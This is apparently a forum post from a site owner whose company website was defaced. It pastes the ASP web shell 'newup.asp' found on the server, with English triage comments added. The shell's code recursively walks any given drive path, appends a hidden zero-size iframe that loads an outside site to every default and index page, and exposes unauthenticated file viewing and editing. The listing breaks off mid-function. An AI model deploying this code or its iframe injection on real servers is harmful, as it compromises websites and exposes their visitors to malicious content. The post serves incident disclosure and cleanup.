日期:2014-05-17  浏览次数:20850 次

公司网站内容被篡改!把网站文件拷下来一看,冷汗!
公司网站内容被篡改,开始怀疑是 SQL 注入,但是刚把网站文件一搜索,汗!
里面目录下有个
\aspnet_client\system_web\1_0_2914_16\newup.asp
打开一看:好毒啊!不知道是谁放进来!!
<%Server.ScriptTimeout=10000
' Page-level settings for the script that the post reports finding at
' \aspnet_client\system_web\1_0_2914_16\newup.asp on a defaced site.
' Server.ScriptTimeout is expressed in seconds, so the line above allows a very long run.
' NOTE(review): presumably this is so the recursive folder walk in Sub sch is not cut off;
' the file itself does not state the reason.
Response.Buffer=False
' Buffering is switched off, so output reaches the client as it is produced.
' Triage note: the post only shows that the file exists, not how it was written to disk.
' The file's creation time and the first logged request for newup.asp are the usual
' starting points for finding the actual entry path (SQL injection was only a suspicion).
%>
<html>
<head>
<title> By   S.D.I-E路 </title>
S.D.I--核心专用   shell
</head>
<body>
<%
' Request dispatcher. No check of the caller's identity appears in this section:
' every value used below is taken directly from the request.
' Request(...) without a collection name looks in the query string, the form body and
' cookies, so the same parameter may arrive by GET or by POST.
ASP_SELF=Request.ServerVariables( "PATH_INFO ")
' fd     -> folder path handed to the folder walk further down (posted by the form below)
' ex     -> action selector
' pth    -> file path the action is applied to
' newcnt -> read here but not used in the visible part of the listing
'           (presumably the new content for the save action; file_save is not shown -- confirm)
s=Request( "fd ")
ex=Request( "ex ")
pth=Request( "pth ")
newcnt=Request( "newcnt ")
' When both ex and pth are supplied the request goes to a file handler (file_show or
' file_save); otherwise the input form is rendered.
If   ex <> " "   AND   pth <> " "   Then
select   Case   ex
Case   "edit "
CALL   file_show(pth)
Case   "save "
CALL   file_save(pth)
End   select
Else
' The form label below reads "enter the path to plant the malicious code in".
' Log review: the form posts fd in the request body, so the folder path is not part of
' the logged URI query; the ex=edit&pth= links produced by Sub step1 are.
%>
<form   action= " <%=ASP_SELF%> "   method= "POST ">
输入要挂马的路径:
<input   type= "text "   name= "fd "   size= "40 ">
<input   type= "submit "   value= "开始 ">
</form>
<%End   If%>
<%
' IsPattern(patt, str): True when the regular expression patt matches anywhere in str,
' False otherwise. Matching ignores letter case.
' Used by the top-level path check and by Sub step_all.
Function   IsPattern(patt,str)
Set   regEx=New   RegExp
regEx.Pattern=patt
regEx.IgnoreCase=True
' Test reports whether a match exists; nothing anchors the pattern to the string start or end.
retVal=regEx.Test(str)
Set   regEx=Nothing
' The Boolean from Test is copied into the function's return value.
If   retVal=True   Then
IsPattern=True
Else
IsPattern=False
End   If
End   Function
' Entry check for the folder walk. The pattern asks for one character other than a/b
' (case-insensitive), a colon, then a backslash or a forward slash: the shape of an
' absolute path on a drive other than A: or B:.
' The pattern is unanchored, so the match may occur anywhere inside s.
' Scope note: any absolute path is accepted, not only paths under this site, so content
' in other folders writable by the web server account should be reviewed as well.
If   IsPattern( "[^ab]{1}:{1}(\\|\/) ",s)   Then
sch   s
Else
' A non-matching, non-empty value yields the message below. Its misspelling ("Agrument")
' is a distinctive string to search for in web roots and in captured responses.
If   s <> " "   Then   Response.Write   "Invalid   Agrument! "
End   If
' sch(s): walks folder s recursively and passes the full path of every file to step_all.
Sub   sch(s)
' Runtime errors are suppressed for the whole Sub, so a folder that cannot be opened or
' listed is passed over without any visible failure.
' NOTE(review): the mixed letter case may be intended to slip past case-sensitive string
' signatures; VBScript ignores case, so content searches should be case-insensitive.
oN   eRrOr   rEsUmE   nExT
Set   fs=Server.createObject( "Scripting.FileSystemObject ")
Set   fd=fs.GetFolder(s)
Set   fi=fd.Files
Set   sf=fd.SubFolders
' Every file in the current folder is examined.
For   Each   f   in   fi
rtn=f.Path
step_all   rtn
Next
' Then each subfolder is visited the same way; no depth limit is applied.
' NOTE(review): l is a Folder object here; presumably its default property (the path)
' is what GetFolder receives on the recursive call -- confirm.
If   sf.Count <> 0   Then
For   Each   l   In   sf
sch   l
Next
End   If
End   Sub
' step_all(agr): filters file paths. Only names of the form default.* or index.* with the
' extension htm, html, asp or php, directly after a path separator, are acted on.
' Clean-up scope: these are the only files the visible code modifies, so every default.*
' and index.* page under the walked folder needs to be inspected.
Sub   step_all(agr)
retVal=IsPattern( "(\\|\/)(default|index)\.(htm|html|asp|php)\b ",agr)
If   retVal   Then
' step1 lists the file as a link in the response; step2 appends markup to the file on disk.
step1   agr
step2   agr
Else
Exit   Sub
End   If
End   Sub
%>
<%Sub   step1(str1) ' step1(str1): writes a link back to this page carrying ex=edit and pth=str1; str1 is emitted without encoding. Requests with ex=edit&pth= in the logged query string show which files were opened through the page.%>
<a   href= " <%=ASP_SELF%> ?ex=edit&pth= <%=str1%> "   target= "_blank "> <%=str1%> </a> <br>
<%End   Sub%>
<%
' step2(str2): appends a fixed block of markup to the end of file str2 if that file exists.
' Nothing checks whether the markup is already present, so a page may carry several copies.
Sub   step2(str2)
' The appended markup is a zero-width, zero-height, borderless iframe, invisible to visitors,
' that loads the external address below. That address and the iframe string are the
' indicators to search for across the web root.
addcode= " <iframe   src=http://www.00sj.com   width=0   height=0   frameborder=0> </iframe> "
Set   fs=Server.createObject( "Scripting.FileSystemObject ")
isExist=fs.FileExists(str2)
If   isExist   Then
Set   f=fs.GetFile(str2)
' OpenAsTextStream(8,-2): 8 opens the file for appending, -2 uses the system default
' text format. Existing content is kept and the iframe is added after it.
Set   f_addcode=f.OpenAsTextStream(8,-2)
f_addcode.Write   addcode
f_addcode.Close
Set   f=Nothing
End   If
Set   fs=Nothing
' Recovery note: because the write is an append, affected pages differ from a known-good
' copy only at the end of the file; comparing against backups or source control shows
' which pages were touched, and last-modified times narrow down when.
End   Sub
%>
<%
Sub   file_show(fname)
Set   fs1=Server.createObject( "Scripting.FileSystemObject ")
isExist=fs1.FileExists(fname)
If   isExist   Then
Set   fcnt=fs1.OpenTextFile(fname)
cnt=fcnt.ReadAll
fcnt.Close
Set